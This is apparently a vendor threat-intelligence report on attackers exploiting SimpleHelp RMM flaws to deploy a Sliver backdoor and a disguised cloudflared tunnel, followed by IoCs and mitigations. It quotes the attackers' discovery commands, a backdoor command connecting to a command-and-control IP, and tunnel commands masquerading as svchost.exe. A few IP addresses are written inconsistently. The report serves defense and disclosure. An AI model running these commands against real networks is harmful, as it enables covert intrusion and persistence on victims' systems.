Not-so-SimpleHelp exploits enabling deployment of Sliver backdoor

Field Effect recently identified and thwarted a sophisticated breach where threat actors exploited newly uncovered vulnerabilities in SimpleHelp’s Remote Monitoring and Management (RMM) client as an entry point to infiltrate and establish unauthorized access within a targeted network.

The attack involved the quick and deliberate execution of several post-compromise tactics, techniques and procedures (TTPs) including network and system discovery, administrator account creation, and the establishment of persistence mechanisms, which could have led to the deployment of ransomware had Field Effect MDR not prevented the attack.

Initial Access

The attack began with the threat actor connecting to the endpoint via the vulnerable SimpleHelp RMM client, called JWrapper-Remote Access, from IP address 194.76.227[.]171. According to a Shodan scan, this IP address is based in Estonia and is running a SimpleHelp Server on port 80.

Image 1: Data associated with IP 194.76.227[.]171 (Source: shodan.io)

Image 2: Screenshot of SimpleHelp instance running on 194.76.227[.]171

According to VirusTotal, only one security vendor considers 194.76.227[.]171 to be malicious, so it’s unlikely that connections from this IP address would arouse suspicion or be blocked by network security devices.

Image 3: Threat score of IP address 194.76.227[.]171 (Source: VirusTotal)

Once successfully connected via RMM, the threat actor quickly executed a series of discovery commands to enumerate system details, user accounts, and network information. Automated Field Effect MDR policies monitoring for the exploitation of SimpleHelp software detected this, issued a high-severity notification to the client, and triggered an immediate analyst investigation and network isolation of the endpoint. 

The following discovery commands were observed:

• ipconfig /all
• sc query
• schtasks
• driverquery
• nltest /dclist:
• nltest /domain_trusts
• net share
• net use
• tasklist
• findstr CSFalcon
• quser
• net group "domain admins" /domain
• hostname
• ping <DC_Hostname>

Backdoor deployment

Once the threat actor understood the environment, they created a new administrator account, generically named ‘sqladmin’. They then used the account to install a backdoor called agent.exe (EC43ED845102760265ED6343EF1FCEF696588905) to serve as an alternative persistence access mechanism in case the RMM access was lost.

Initial analysis of the agent.exe binary revealed strings consistent with the Sliver post-exploitation tool written in Go. In addition to networking capabilities, patterns within the set of libraries imported by this binary indicate likely process injection, service tampering, command and process execution, and file system manipulation capabilities. This is consistent with the expected capabilities of the Sliver implant, though the use of these functions within the agent.exe binary has not yet been fully assessed.

Further analysis of the HTTPS C2 communications initiated by the agent.exe binary revealed a client JA3 hash of ‘d6828e30ab66774a91a96ae93be4ae4c’, which has been previously observed in association with Sliver, an open-source adversary simulation and red teaming framework developed by BishopFox, intended for penetration testing but widely abused by threat actors as a backdoor.

Similar to Cobalt Strike and Metasploit, Sliver provides command-and-control (C2) capabilities, allowing attackers to execute commands, move laterally, and maintain persistence on compromised systems. It supports multiple transport methods (DNS, HTTP/TLS, MTLS, WireGuard) and evades traditional security tools due to its modular, Go-based architecture.

The backdoor was configured to connect to the IP address 45.9.148[.]136 on port 443 via the following command:

agent.exe -connect 45.9.148[.]136:443 -ignore-cert

According to Shodan, 45.9.148[.]136 is based in the Netherlands and has services configured on port 22 (OpenSSH), 443, 7071 (AnyDesk), and 8080. An Nmap scan also revealed that a service called ‘realserver’ is running on port 7070. It's likely that Shodan and Nmap scans don’t show the services running on ports 443 and 8080 because the server has been configured by the threat actor not to provide this information.

Image 4: Data associated with IP 45.9.148[.]136 (Source: shodan.io)

According to VirusTotal, IP 45.9.148[.]136 is currently only recognized as suspicious by 1 out of 94 security vendors, again making it unlikely that connections from this IP address would arouse suspicion or be blocked by network security devices.

Image 5: Threat score of IP address 45.9.149[.]136 (Source: VirusTotal)

Subsequent analysis of agent.exe revealed that it was configured with a secondary command and control (C2) IP address, 45.9.149[.]112. According to Shodan, this IP address is also based in the Netherlands and has Remote Desktop Protocol (RDP) open on port 3389.

Additional analysis using Censys indicates that this IP is also running an AnyDesk server on port 7070, similar to the primary C2 IP address.

Image 6: Data associated with IP 45.9.149[.]112 (Source: censys.io)

According to VirusTotal, IP 45.9.149[.]112 is only recognized as suspicious by 2 out of 94 security vendors.

Image 7: Threat score of IP address 45.9.149[.]112 (Source: VirusTotal)

Lateral movement

The threat actor then focused their attention on the target’s domain controller (DC), the location of which they learned from the discovery commands executed earlier. Once a connection was established again via the vulnerable SimpleHelp RMM client on the DC, the threat actors executed the same discovery commands previously seen and created an administrator account named ‘fpmhlttech’.

However, this time, instead of installing the agent.exe backdoor, the threat actor installed a cloudflared tunnel that was renamed C:\Windows\svchost.exe to masquerade as the legitimate Windows svchost.exe, via the following command:

c:\Windows\svchost.exe svchost.exe service install (redacted Base64 encoded token)

The threat actor then executed the tunnel via the following command:

c:\Windows\svchost.exe tunnel run --token (redacted Base64 encoded token)

A cloudflared tunnel is a secure, encrypted connection that routes traffic from a local network or device to Cloudflare’s network without exposing public IPs, often used for legitimate remote access, proxying, or bypassing firewall restrictions. The characters following ‘--token’ in the command make up the unique Base64 encoded token assigned to each cloudflared tunnel.

Additional detection and host isolation

Attempted tunnel execution was blocked by the Field Effect MDR endpoint agent, following which the system was also isolated from the network. However, had this activity not been detected and mitigated so quickly, the cloudflared tunnel would have allowed the threat actor to download and install additional payloads, most likely resulting in a ransomware attack.

A postmortem assessment of the attack determined that the victim organization didn’t see an alert we had sent a week prior to the incident. The alert indicated we had detected potentially vulnerable SimpleHelp RMM client software in their environment. Thus, the victim wasn’t aware it had SimpleHelp software at all in its environment, let alone vulnerable software. All instances of SimpleHelp have since been removed.  

Attribution

The TTPs observed in this attack, specifically the installation of a cloudflared tunnel, closely resemble those observed in a campaign attributed to the Akira Ransomware group reported by Recon Infosec in May 2023.

However, there isn’t enough overlap for Field Effect to assess with high confidence that Akira was responsible for the attack we observed. The TTPs observed could easily be adopted by other threat actors and are thus not exclusive to Akira.     

Previous attack

On January 28, Field Effect observed and subsequently published a security intelligence post detailing an incident involving a threat actor connecting to a SimpleHelp RMM instance and immediately using this access to disable anti-virus software installed on the host. At the time, we were unable to confirm that this incident was due to the exploitation of a vulnerability.

Field Effect can now confirm that incident was also the result of the exploitation of SimpleHelp RMM vulnerabilities. Analysis of the affected SimpleHelp RMM server configuration file has shown that it had been modified to allow connections from a malicious SimpleHelp server running on Russia-based IP address 213.183.45[.]230.

Image 8: Modified SimpleHelp RMM client configuration file allowing connection to malicious SimpleHelp server on Russian IP 213.183.45[.]230

According to Censys, IP 213.183.45[.]230 hosts a SimpleHelp RMM server on ports 80 and 443, as well as an SSH service on port 22 and an unknown service on port 5939.

Image 9: Services running on Russian IP 213.183.45[.]230 (Source: censys.io)

Image 10: Screenshot of SimpleHelp instance running on 213.183.45[.]230

According to VirusTotal, IP 213.183.45[.]230 is currently not recognized by any security vendor as malicious/suspicious, and could therefore represent infrastructure newly acquired by the threat actor specifically for SimpleHelp exploitation-related campaigns.

Image 11: Threat score of IP address 213.173.45.230 (Source: Virus Total)

Conclusion

This campaign demonstrates just one example of how threat actors are actively exploiting SimpleHelp RMM vulnerabilities to gain unauthorized persistent access to networks of interest. There could be many other types of attacks currently ongoing. Organizations with exposure to these vulnerabilities must update their RMM clients as soon as possible and consider adopting a cybersecurity solution to defend against threats.

In this scenario, Field Effect MDR was able to prevent the attack from escalating to what could have resulted in a ransomware incident. This illustrates the significance of detecting threats early and responding accordingly to limit spread and minimize impact.

Field Effect’s Security Intelligence team continues to track this activity and will provide updates as new intelligence emerges.

Mitigation

To defend against these attacks, organizations using SimpleHelp RMM should take the following steps:

1. Patch & update: Ensure SimpleHelp and all remote access tools are up to date to mitigate known vulnerabilities.
2. Restrict remote access: Limit SimpleHelp access to trusted IP ranges and implement multi-factor authentication (MFA).
3. Monitor for IoCs: Actively monitor network traffic and logs for connections to the listed malicious IPs.
4. Audit user accounts: Regularly review administrative accounts for unauthorized additions like ‘sqladmin’ and ‘fpmhlttech’ which were observed in this incident.
5. Threat hunting: Search for the presence of agent.exe or cloudflared.exe masquerading in unexpected locations.

Indicators of compromise

213.173.45[.]230 (Observed hosting malicious SimpleHelp instance)

194.76.227[.]171 (Observed hosting malicious SimpleHelp instance)

45.9.148[.]136 (Primary C2 Server)

45.9.149[.]112 (Secondary C2 Server)

385a826b9f7e72b870a92f1901d9d354 (agent.exe MD5)

EC43ED845102760265ED6343EF1FCEF696588905 (agent.exe SHA1)

15f3e5b47894b953542d2fe2353786229da47af00c96dc1b41a8efe631364e49 (agent.exe SHA256)

d6828e30ab66774a91a96ae93be4ae4c (C2 JA3)

475c9302dc42b2751db9edcac3b74891 (C2 JA3s)

If you have any questions or comments regarding this analysis, please contact us.

Stay on top of emerging threats.

Sign up to receive a weekly roundup of our security intelligence feed. You'll be the first to know of emerging attack vectors, threats, and vulnerabilities.

Sign up